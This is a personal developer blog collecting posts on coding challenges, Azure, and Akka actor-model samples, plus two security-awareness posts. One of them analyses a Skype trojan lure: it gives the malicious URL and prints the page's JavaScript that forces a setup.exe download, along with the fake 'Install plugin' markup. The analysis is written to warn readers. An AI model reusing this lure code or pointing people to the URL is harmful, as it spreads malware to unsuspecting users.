Malisa Ncube


Codility code challenges – The initiation

Posted by Malisa Ncube on

I only discovered Codility a few weeks ago and realised that it is used by quite a number of developers for code challenges, just like Hackerrank and Project Euler. It seems to be the new kid on the block but has become very popular and clearly I’ve been living under a rock not to know what is happening in that world.

I immediately created a new repository where I started committing some solutions to challenges that I saw. These solutions are for practice and may not all be running in O(1), O(log n) or O(log n) time or space as often required. In short, some may be inefficient to enable reasoning towards faster solutions and I’ll keep those old versions to enable my thought story to remain persisted.

The link is https://github.com/malisancube/codility and depending on the challenge source, I should also start having hackerrank, project euler, pramp among others. I already have 25 scripts in this repo. πŸ™‚

I think this is going to be fun. I’ll discuss some of the challenges that I find interesting here. I will mainly use Python and C# as languages. LinqPad and VSCode are the tools of choice. In the process I hope to learn some of the new Python 3.0 syntax.

While I generally like code challenges, I think they miss critical parts of software development, which is Architecture, Teamwork, Work Ethic and other soft skills . I think they should not be solely used to determine if the developer is excellent. They are good to see how the engineer thinks and distills an idea from usually a brute force approach to a better solution and how the handling of edge cases.

If you’re also interested in these kind of things, ping me and we share ideas.

Back online

Posted by Malisa Ncube on

This is my quick way to get back online. Its been a while and my attempt in running a node.js based site on this platform failed because of permissions and all tricks were also met with some forms of blockage.

Now, I’m thinking about my old content. Wondering if I should try and import it here or just start from scratch. I also used to blog on
http://geekswithblogs.net/malisancube sometime back, until I moved to a ghost blog engine that I was running on Azure on this domain. There were many iterations of ghost blog and the authors changed the installation procedure too and I could not keep up. The best way is to use their subscription service which keeps you up to date with features and security patches. I’ve then just decided to go simple – WordPress.

Its sad that cPanel still cannot run .NET Core. I’d really love to see that happen soon, and possibly get OrchardProject.Net for this. I love WordPress and have so much respect for it as a product, and it has stood time, has received many security patches because as you know, hackers like to attack the most popular products. I’d love a .NET centric site more because I’d find it easier to continuously tweak it or ticker with stuff on it.

Anyways, I called this site .NET delights, when its actually not only about .NET. Its about all coding I do in general and some other stuff I create including music and poetry. I intend to collate all content here and hopefully it will enable me to document some of the stuff I like to do.

This site contains my views and not those of any organisation.

Catch you on the next posts. πŸ˜€

Speaking at Geeknight at Outbox

Posted by Malisa Ncube on

Hey Geeks!

I will be speaking at Geeknight Event at Outbox on the 26 April 2016 from 6:00 PM to 8:00 PM.

It will be about designing distributed applications. This time we will look into design challenges and considerations you would want to know about before you let your application loose into the wild.

Some of the areas we will look at include the following:

  • Designing for scale
  • Dealing with streaming data
  • The reactive manifesto
  • Performance pain points
  • Azure Service Fabric
  • And many more…

This talk will not get into religious debates about whether Java is better than C# or Django than Rails.

We will also review some code and discussions. It will be fun!

Does this sound interesting? I think it does, so register here now!

See you there.

Xamarin Bug on Properties page

Posted by Malisa Ncube on

I have been using Xamarin for a while and consistently I have come to realise a bug which causes Visual Studio to freeze. This happens when you’re loading a solution. In my case, if I make some changes to the properties window of anything which uses Android SDK save, close the solution without closing the properties page the next time I open that solution VS will fail to load it. I have to kill the VS process from the task manager. No matter what how many times I restart VS, the solution will never load.

VSinitialisingImg

I’m using VS2015. You need to close VS and then delete the .suo file from

.vs\<ProjectName>\v14\ 

folder

It is a hidden file so you need to show the file first using the following method http://www.isunshare.com/windows-10/show-hidden-files-and-folders-in-windows-10.html

Avoid getting hacked 2 – Suspicious Emails

Posted by Malisa Ncube on

Problem

This morning I received a very interesting email. It urged me to process a purchasing order and had a couple of attachments in it.

Most computer users would probably just download the attachments, double-click and proceed to open. This particular one is very interesting in that it managed to escape the anti-virus application and seemed really legitimate. This is an email which you may receive in your company and you simply open it without knowing what it may do. So I set out to look at it a little deeper.

The following is the screenshot of the email

Would you think this email may be a beginning of a cyber-attack? Well… It could be.

As anyone would do I opened the attachments and found the following. A zipped executable file with a fake jpeg extension as part of the name – I was careful not to run the executable. The rest of the attachments were useless pdf with schematics and some Iranian addresses.

Investigation

I fired-up my PEBrowser and tried to inspect the contents of “Technical Data Specifications jpeg.exe”. The result was as follows.

I realised it’s a .NET application compiled with 3.5 framework. You can see that it imports the Microsoft Runtime Execution Engine library – mscoree.dll which is part of the .NET framework. It also clearly shows .NET methods section which has 274 Methods and 49 classes. It was indeed and executable file and I made effort to inspect the IL quickly.

It was obfuscated to prevent people like me from trying to understand what is happening under the hood. I tried using dotPeek to decompile it and search for anything suspicious like PInvokes. Because of obfuscation I could not tell the logic very well even through PEBrowser. The IL was confusing because the most names had been scrambled to incomprehensible strings. I then saw this.

There is PInvoke to the Kernel32.dll. The program does interact with the system copying files – which in this case I don’t know.

There is quite a lot of logic in this application and not clear what it does, it probably does something very harmful. I’m sure it is not designed to give you Christmas gifts or sing you a lullaby.

I wonder why this was allowed to propagate into my email client. Is it because its a .NET program and Antivirus applications “trust” it? Given that it runs on .NET 3.5 the surface area of attack is very wide, which is good news for the attacker.

So next time you open an email, check carefully for the kind of attachments as you could be a victim of hacking.

Looks like the days of “I love you” worm are back, but exploiting .NET rather than VBS.

I found this link to be good for non-technical people
http://www.businessinsider.com/how-to-avoid-being-hacked-2015-4

10 Wishes I have for Microsoft Azure

Posted by Malisa Ncube on

These are some of the wishes I have for Windows Azure using Visual Studio. I wish I could tick all of them off as available or be found wrong in thinking that they don’t exist when they actually do. They have either not been straightforward or seemed completely absent and have made me lose a lot of hair, gain weight and wish for a beer on Monday morning.

Lets get right into it.

  1. Reverse engineer all settings from a subscription and generate a powershell script which when I run against another subscription I would get exactly the same configuration.

  2. DocumentDb to be improved to support IQueryable. I want to simply write a linq statement and the SQL expression is generated and I don’t have to write the SQL query my self – I feel like I’m going back to 1980. I am thinking of customising a linq translator online for this and get my repository cleaner.

  3. There is little to no documentation for using Azure CDN online. Let me not even mention best practices or samples.

  4. While its good that Azure ServiceBus supports AMQP, it would be nice to support more. e.g. MQTT – if IoT is the future why is this not reflected here?

  5. HDInsight clusters are insanely expensive. You set it up today with minimal cores and the next 2 days it has consumed a sizable chunk of your balance.

  6. HBase SDK is almost unusable. It will be nice if the SDK was complete and we could have a proper Northwind sample or NerdDinner that will follow good practices e.g. Unit Testing, BDD, Repositories, Desired State Configuration, Continuous Delivery and such. Have a way to map to entities.

  7. The schema evolution of the database is still not Azure friendly. e.g. What happens if you want to force drop/create.

  8. Entity framework does not seem geared for sharding on Azure

  9. I think it would be nice to enable better reporting on errors/exceptions. Maybe have a debug deployment which compiles with debug symbols and gives you a more details stacktrace.

  10. Publishing from Visual Studio sometimes works and sometimes it doesn’t. I have noticed that making major changes to the project and publishing using Visual Studio tools does not properly clean the existing installation often resulting in old files and new files all thrown around the installation folder. I normally have to delete my webapp and recreate it to have this work. Very frustrating.

Akka – A peek into the parallel cloud

Posted by Malisa Ncube on

1) Introduction

In the past few weeks I decided to enter the distributed parallel computation model that is influenced by Actors and characterized by passing of messages, examining and processing messages. This model maps well to cloud computing as there is no shared state which would cause major concurrency problems. The Actor system came from research work by Carl Hewitt in the 70’s and is quickly gaining popularity recently with many projects coming into the limelight including Microsoft Project Orleans, Akka.Net among others.

Halo is a popular game which is played by many people around the world. It uses a distributed model that enables collection of game data from players, crunching of that data and producing complex aggregates and statistics in relation to the performance each of the gamers.

With so many connected services and the new Internet Of things (IoT) paradigm, we are left with a challenge of manipulating large amounts of data, transmitting larger amounts of data and satisfying the user need of instant feedback/results while battling with latency and inherent complexity of concurrency.

Parallelism and Concurrency are different and I will spare you the semantics.

Quoting Sun’s Multithreaded Programming Guide:

Concurrency: A condition that exists when at least two threads are making progress. A more generalized form of parallelism that can include time-slicing as a form of virtual parallelism.

Parallelism: A condition that arises when at least two threads are executing simultaneously.

The focus of my post is not going to be about shared state parallelism or multi-core development that can give you gains by leveraging the multiple processors. These can be implemented using many approaches including threads or thread pools. In the .NET world you would select from many language features including async/await with the Task Parallel Library (TPL) creating Task-based Asynchronous Programming (TAP), PLINQ, Event-based Asynchronous Programming (EAP) or the TPL dataflow library and Reactive Extensions (Rx).

With scalability which requires multiple threading, cores, machines and geolocation we land into distributed applications and the bigger the scale the more we need to understand that failure will happen and we need to embrace it gracefully. The Actor model enables us to adopt the β€œLet it crash” philosophy knowing that the failed components will be restored to proper state.

2) Akka

This is by no means an exhaustive look into Akka, but an introduction based on my assimilation from a couple of sources. I have found it very interesting and think it is a toolkit I’d like to adopt for cloud applications and most specifically the .NET port.

Akka is a fast growing toolkit that promises easier development of powerful concurrent, fault tolerant, event driven and distributed applications on the JVM. Akka is a message based open-source library with support for Java and Scala and has a .NET /Mono port. It enables creation of lightweight actors that pass messages to each other, create new actors and perform computations.
An important part about this toolkit is integration. There are several parts that make up Akka

  1. Actor model which enables re-integration of data within one machine
  2. Cluster / remoting integrate between subsystems
  3. Http for external systems

With Akka, some of the main things are maximum throughput with acceptable latency and proper scalability to unlimited number of connections, server and client side support and open or composable api. More specifically the Akka-http is focused on fully asynchronous / non blocking, actor friendly, lightweight, composability and is based on spray.io codebase and experience.

Lets look at a simple scala example below

    import akka.actor.{ ActorRef, ActorSystem, Props, Actor, Inbox }
    import scala.concurrent.duration._

    case object Greet
    case class WhoToGreet(who: String)
    case class Greeting(message: String)

    class Greeter extends Actor {
      var greeting = ""

      def receive = {
    case WhoToGreet(who) => greeting = s"hello, $who"
    case Greet   => sender ! Greeting(greeting) // Send the current greeting back to the sender
      }
    }

    object HelloAkkaScala extends App {

      // Create the 'helloakka' actor system
      val system = ActorSystem("helloakka")

      // Create the 'greeter' actor
      val greeter = system.actorOf(Props[Greeter], "greeter")

      // Create an "actor-in-a-box"
      val inbox = Inbox.create(system)

      // Tell the 'greeter' to change its 'greeting' message
      greeter.tell(WhoToGreet("akka"), ActorRef.noSender)

      // Ask the 'greeter for the latest 'greeting'
      // Reply should go to the "actor-in-a-box"
      inbox.send(greeter, Greet)

      // Wait 5 seconds for the reply with the 'greeting' message
      val Greeting(message1) = inbox.receive(5.seconds)
      println(s"Greeting: $message1")

      // Change the greeting and ask for it again
      greeter.tell(WhoToGreet("typesafe"), ActorRef.noSender)
      inbox.send(greeter, Greet)
      val Greeting(message2) = inbox.receive(5.seconds)
      println(s"Greeting: $message2")

      val greetPrinter = system.actorOf(Props[GreetPrinter])
      // after zero seconds, send a Greet message every second to the greeter with a sender of the greetPrinter
      system.scheduler.schedule(0.seconds, 1.second, greeter, Greet)(system.dispatcher, greetPrinter)

    }

    // prints a greeting
    class GreetPrinter extends Actor {
      def receive = {
    case Greeting(message) => println(message)
      }
    }

We can see that at the beginning we create an Actor system, this will provide a container for the actors we will have in our application. We then create the greeter actor which inherits from the Actor base class, place it in our actor system. We can then send messages to the Actor using the actor system or directly.

Akka also provides reactive streams based API, enabling you to throttle responses to reduce the back pressure where the client tries to download 20Gb of data. The are an abstraction for asynchronous and non-blocking pipeline processing. This enables automatic handling of back pressure. There is a joint effort of Netflix, Twitter, RedHat, Pivotal and TypeSafe.

The .NET example below shows the same thing. The actor system is created and then messages are sent to the actors. The example below is more elegant because of generics. This example is part of the akka.net development repository on https://github.com/akkadotnet/akka.net/

    using System;
    using Akka.Actor;

    namespace HelloAkka
    {
        class Program
        {
            static void Main(string[] args)
            {
                // create a new actor system (a container for actors)
                var system = ActorSystem.Create("MySystem");

                // create actor and get a reference to it.
                // this will be an "ActorRef", which is not a 
                // reference to the actual actor instance
                // but rather a client or proxy to it
                var greeter = system.ActorOf<GreetingActor>("greeter");

                // send a message to the actor
                greeter.Tell(new Greet("World"));

                // prevent the application from exiting before message is handled
                Console.ReadLine();
            }
        }
    }

    public class GreetingActor : ReceiveActor
    {
        public GreetingActor()
        {
            // Tell the actor to respond to the Greet message
            Receive<Greet>(greet => Console.WriteLine("Hello {0}", greet.Who));
        }
    }

    public class Greet
    {
        public string Who { get; private set; }

        public Greet(string who)
        {
            Who = who;
        }
    }

Dowloading the akka.net from github gives you the following.

Naturally some of the examples are in F#. Some of the Akka

Other Benefits of using Akka include

  • Properly typed model for requests and responses and nested entities
  • Entities can have arbitrary size
  • It can now receive message headers before entity
  • Server side routing DSL
  • Testing routes
  • Client side APIs
  • JSON support
  • Compression and Decompression (GZip/Deflate)
  • Immutable
  • Efficient http parsing and rendering
  • Powerful DSL for server-side REST API definition
  • Route structure testkit

I am watching the Akka.NET project and very optimistic about where it is going. I am working examples and a deeper diver into the internal mechanics of the .NET port and most specifically its work on Microsoft Azure.

Reactive Extensions – http://reactivex.io/
Halo – https://www.halowaypoint.com/en-us/games
Carl Hewitt – http://en.wikipedia.org/wiki/Carl_Hewitt
Orbit Framework – https://github.com/electronicarts/orbit, http://orbit.bioware.com/
Project Orleans – https://github.com/dotnet/orleans

Avoid getting-hacked – Watch out for trojans

Posted by Malisa Ncube on

Earlier today, I received a message on Skype on my PC from a friend.

Malisa Ncube video: http://24onlineskyvideo.in.ua/video/?n=Malisa%20Ncube πŸ™‚

The message came through a contact on Skype, who I suspect has infected his PC. On clicking the link, one would see a screen like this below.

It quite deceptive in that, it pretends to be buffering the video and the play button in the center glows like any common video you can play. It was quite suspicious for me in that moment because I was accessing internet from a restricted network which does not allow videos, YouTube, and other social networks. I was curious, so I clicked the play button. The site pretended to be loading and then displayed the following message.

This was even more interesting because, I wondered what plugin I need to run this video. My first assumption was that when I click on the Install plugin… button it would redirect me to Adobe.com and enable me to install flash before redirecting back to the site, but No. Clicking on the link downloads a setup.exe file which you don’t know what it may do to your PC.

Lets get back to the beginning and look at the address bar. It reads

http://24onlineskyvideo.in.ua/video/?n=Malisa%20Ncube

so I tried a couple of things. I changed it to

http://24onlineskyvideo.in.ua/video/?n=Saggy%20Pants

and you may already suspect what happened. The initial impression is that of a video personalised to you, but by changing the url to Saggy Pants, it will be dedicated to Mr Saggy Pants. Now lets look at the source.

The code that presents the install button is as follows

            <div id="cap">
                <p><img src="images/icon.png?id=5"></p>
                <p>A plugin is needed to display this video</p>
                <p><button onclick="nw()">&nbsp;Install plugin...&nbsp;</button></p>
            </div>

By clicking on the button you invoke the nw() function shown below. The entire site is made up of one HTML file with javascript embedded and the truth is there is no video to talk about here. The player you see on the first page is drawn by a CSS style.

        var nw=function(){

            var b="http://"+location.hostname+"/setup.exe";
            if(navigator.userAgent.toLowerCase().indexOf('chrome')>-1){
                ___newWindow=window.open("data:text/html,"+encodeURIComponent("<html><head><script>window.location.href='about:blank';\x3c/script></head></html>"),"__dFrame");window.setTimeout(function(){var a=window.document.createElement("script");a.type="text/javascript";a.text="window.location.href='"+b+"'";___newWindow.document.head.appendChild(a)},100)
            }
            else
                setTimeout(function(){
                        location.href=b;
                },100)


            ga('send', 'pageview', '/d');


        }; 

I also noticed the developer of the site is interested in analytics of his site. So he embedded some google analytics on it as follows.

There is also a comment box below which look like it will post the comment to your facebook account. The code is shown below. Check the data-href πŸ™‚

        <div id="comments">
            <div style="position:absolute;top:0;right:0;width:100%;height:400px;z-index:9999"></div>
            <div id="fb-root"></div>
            <script>(function(d, s, id) {
              var js, fjs = d.getElementsByTagName(s)[0];
              if (d.getElementById(id)) return;
              js = d.createElement(s); js.id = id;
              js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.0";
              fjs.parentNode.insertBefore(js, fjs);
            }(document, 'script', 'facebook-jssdk'));</script>
                    </div>
            <div class="fb-comments" data-href="http://knowyourmeme.com/videos/106730-like-a-boss" data-width="1000" data-numposts="5" data-colorscheme="light"></div>

        </div> 

NOTE: So next time you open a link, it is important to ensure that it does not prompt you to download some setup file that will possibly enable the hacker to gain access to your PC, or spread through your Skype application sending messages to your contacts.

June Geeknight – Reflection and slides

Posted by Malisa Ncube on

The following are the slides from the Geeknight event we had at ThoughtWorks on 22 June. I should say I was very excited to meet such a vibrant audience that asked many challenging questions.

The content was packed and it was hard to keep the talk to an hour. Its clear to me that we are a community which is not only vibrant but hungry for technical knowledge.

You may view or download the slides from slideshare below.

You may get more information about GeekNight and the impact on:

If you’d like to have more information on cloud computing patterns

Speaking at Geek-night – Kampala

Posted by Malisa Ncube on

I will be speaking tonight 24 June 2014, time 05:30PM at the GeekNight Event which will be held at Thoughtworks Kampala, see location information here. I will talk about cloud computing approaches and things that you’d need to keep in mind when you are developing applications that can be considered native on the cloud.

I don’t intend to talk about the “how-to’s” this time but to answer the question, “Why and When?”. I will obviously use examples from Microsoft Azure as that is more familiar to me than other cloud service providers.

Some of the things I will talk about include:

  • Elastic scaling
  • MapReduce approach
  • Database Federation
  • Node Failure Patterns
  • Multitenancy
  • And many more….

There is going to be quite a lot of content that will reveal how successful organisations have managed to scale their applications and what are some of the pitfalls you may want to watch out for if you are going to implement a large scale system.

See you there.